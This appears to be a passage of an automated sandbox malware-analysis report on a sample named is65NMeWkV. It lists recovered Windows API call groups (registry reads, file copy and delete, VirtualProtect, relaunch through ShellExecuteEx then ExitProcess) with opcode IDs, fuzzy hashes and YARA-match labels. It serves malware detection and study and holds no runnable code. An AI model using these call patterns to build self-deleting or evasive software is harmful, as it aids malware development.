                                      • lstrlenA.KERNEL32(?,?,0041140C,?,00880860), ref: 004192A7
                                      • wsprintfA.USER32 ref: 004192C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0230151B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02301522
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0230153E
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0230155C
                                      • RegCloseKey.ADVAPI32(?), ref: 02301566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: 376aa551060f53f9c823618b62f85fb50fac055c5200202cadda3f0d40003efe
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: E90131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C74E
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __getptd.LIBCMT ref: 0041C765
                                      • __amsg_exit.LIBCMT ref: 0041C773
                                      • __lock.LIBCMT ref: 0041C783
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                      • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                                      • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                      • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                      APIs
                                      • __getptd.LIBCMT ref: 0231C9B5
                                        • Part of subcall function 0231C206: __getptd_noexit.LIBCMT ref: 0231C209
                                        • Part of subcall function 0231C206: __amsg_exit.LIBCMT ref: 0231C216
                                      • __getptd.LIBCMT ref: 0231C9CC
                                      • __amsg_exit.LIBCMT ref: 0231C9DA
                                      • __lock.LIBCMT ref: 0231C9EA
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0231C9FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                      • Instruction ID: bfc7ca3f3c7516f13e10f4e60c0f93df12c78afdcd7e6afca0c48928d97a728d
                                      • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                      • Instruction Fuzzy Hash: BFF0B432AD07109BDB3DBBA89802B5D73B2AF00728F10154BD414AB1D0DB245552DF9F
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,00878410), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,00878320), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,00878400), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                      • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                      • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                      • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,00878410), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,00878320), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,00878400), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                      • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                      • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                      • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                      • ExitProcess.KERNEL32 ref: 00416755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                      • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                      • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                      • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 023168CA
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0231698D
                                      • ExitProcess.KERNEL32 ref: 023169BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction ID: 7c62dfb89eb15b63304611ab849ab6ffbbca192a44e80612a4eecdf002ad37c4
                                      • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction Fuzzy Hash: F5312EF1901218ABDB28EF90DD95FDEB77AAF44300F405199E209A7190DF746B88CF59
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: @Jn@$Jn@$Jn@
                                      • API String ID: 544645111-1180188686
                                      • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                      • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrcpy
                                      • String ID: vI@$vI@
                                      • API String ID: 3905823039-1245421781
                                      • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                      • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                      • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                      • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • wsprintfW.USER32 ref: 00418D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 659108358-2783943728
                                      • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                      • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                      • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                      • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                      • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                      • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230A548
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0230A666
                                      • lstrlen.KERNEL32(00000000), ref: 0230A923
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230A9AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction ID: 33b2dd586383a1480cecc553263775659ee4ad01403480df80a8bad012131fa7
                                      • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction Fuzzy Hash: E8E1E172911218ABCB2DFBA4DD90DEEB73AAF54301F508159E156B2090EF346B4CCF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                      • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                      • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                      • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230D6E8
                                      • lstrlen.KERNEL32(00000000), ref: 0230D8FF
                                      • lstrlen.KERNEL32(00000000), ref: 0230D913
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230D992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction ID: 82ccc54732359f7d2668aa1213e954f72094fb28edee38dd6d837d2532ec3c2b
